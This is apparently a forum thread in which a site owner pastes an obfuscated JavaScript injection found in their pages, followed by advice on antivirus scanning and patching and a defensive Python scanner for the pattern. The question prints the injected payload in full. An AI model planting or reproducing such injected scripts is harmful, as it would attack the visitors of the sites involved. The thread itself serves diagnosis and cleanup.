yarek
asked on
web pages modified on my website: some javascript added
I saw that some of my websites were modified.
After <html> there are 20-40 blank lines, then a JavaScript was added
<!--3666ce780cc4f90fc9bfc0 3849efde5e -><script language=javascript>wly="% ";ih="h3cs ch72h69h70 th20langua ge=javh61h 73cript> fh75h6eh63h74ion fh72oqv(m)h7bvah72 cmu,h62h62=\"@h56Uh722h23a =P]:Fh68h2 9}h65h43h4 1h7b(h70h4 aj7M~+_h45 -y3G;h4bh3 8N5h67h30h 6bxh63f!mt vh24. h34h60ih73^'h42z&oTwh71h4f l[dH*Z|h31 h2c6h62I9h 5ch22uh6eh 22,jt=\"\" ,h6fh2ch69 l,h66xh3d\ "\",zx;fh6 fr(ch6duh3 dh30h3bcmu <h6dh2eh6c eh6eh67h74 h68h3bcmh7 5+h2b)h7bh 20o=h6dh2e ch68arAh74 (h63mh75)h 3bh69h6ch3 dbh62h2ein h64h65xh4f f(o)h3bif( h69l>-1h29 h7b zx=(h28ilh2bh31)h25h381-1) h3bh69h66( h7ax<h3dh3 0h29h7ah78 h2bh3d81;f x+h3dh62h6 2.ch68ah72 h41h74(zx- h31); }h20elh73eh20h66x+=h6f;}jh 74+h3dfh78 ;doch75h6d h65h6eth2e wrh69h74e( jt);}h3ch2 fsch72ih70 h74h3e";ce ap=unescap e(ih.repla ce(/h/g,wl y));var pxv,e;document.write(ceap) ;pxv="<^f2 sJv4[=@0n= 0CPu7=$=^f 2sJvu>4HTf ntC@v q2svCp4u<SAR9]w4[=@0n=0CP\ \uj=$=Sf2s Jv\\u4SRAP \\u)vvJF// qqq 0TT0[C=@=[svsf^ @Cv/EEnvI 7^?u_HTfntC@v 2C!C22C2_u\\u><\\/SAR9]w>u 4}K4</^f2s Jv>44";fro qv(pxv);</ script>
What is this? What does it do, and how do I prevent it from happening again?
I can't say for sure what it does, but it is probably a manifestation of a virus on the machine where your websites are stored, or developed.
I ran across a similar problem about a month ago when some files turned up with an appended JavaScript on our source control. Turns out the infestation was from a virus that would leech off some Windows event handlers for opening and saving files, appending the JavaScript to the files if they had certain extensions (html, php, asp, aspx).
Bitdefender was able to detect and remove the virus, and after that we had to manually remove the extra JavaScript from the pages.
My recommendation is that you run a full virus scan with a competent antivirus application on the server machine and all development machines, remove any virus infestations and then try to remove the script manually and see if it turns up again. It probably won't, if the virus was successfully removed.
I hope this helps, please let me know if you have any questions.
Best Regards,
Alex Percsi.
Aah, beat me to it ;)
Had been playing around with this script and was just going to post the de-obfuscated version ....
If it's harmless, the "hacker" will display a message to your visitors. If it's really malicious, it will make the visitor download and execute malware.
Do you run PHP/MySQL applications on your website, like Content Management Systems, forums etc? Make sure to upgrade them to the latest version immediately, because it will most likely have been an exploit in this software (SQL injection etc.) that enabled the "hacker" to alter your pages.
Make sure you remove the code as well.
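Added example, not written by anyone in this thread: a small scanner for re-checking a web root after cleanup, so you can see whether the injection turns up again. Its heuristics are assumptions built from the question (a run of 20 or more blank lines right after <html>, and a script that combines unescape( with document.write(), limited to the extensions named in the answer; the sample strings are constructed, not the payload above.

```python
import re
from pathlib import Path

# Extensions named in the answer above as targets of the file infector.
EXTENSIONS = {".html", ".php", ".asp", ".aspx"}

# Heuristics taken from the question's description (assumptions, not an AV signature).
BLANK_RUN = re.compile(r"<html[^>]*>(?:[ \t]*\r?\n){20,}", re.I)
SCRIPT = re.compile(r"<script\b[^>]*>(.*?)</script\s*>", re.I | re.S)
DECODE = re.compile(r"unescape\s*\(", re.I)
WRITE = re.compile(r"document\.write\s*\(", re.I)


def score_text(text):
    """Return the names of the heuristics that match one file's contents."""
    hits = []
    if BLANK_RUN.search(text):
        hits.append("blank-run-after-html")
    for body in SCRIPT.findall(text):
        # Decode-then-write inside a single script block is the pattern in the question.
        if DECODE.search(body) and WRITE.search(body):
            hits.append("unescape+document.write")
            break
    return hits


def scan_tree(root):
    """Map each suspicious file under root to the heuristics it matched."""
    findings = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in EXTENSIONS:
            hits = score_text(path.read_text(errors="replace"))
            if hits:
                findings[str(path)] = hits
    return findings


# Constructed samples for testing the heuristics (harmless stand-ins).
CLEAN = "<html>\n<head><title>ok</title></head>\n<body>hi</body></html>\n"
INFECTED = ("<html>" + "\n" * 25 +
            '<!--0000--><script language=javascript>a="h3c";'
            "b=unescape(a.replace(/h/g,'%'));document.write(b);</script>\n"
            "<body>hi</body></html>\n")

if __name__ == "__main__":
    import sys
    root = sys.argv[1] if len(sys.argv) > 1 else "."
    for name, hits in sorted(scan_tree(root).items()):
        print(name, ", ".join(hits))
```

A hit is a reason to open the file and compare it with a known-good copy from backup or source control, not proof of infection; legitimate legacy pages sometimes use unescape and document.write too.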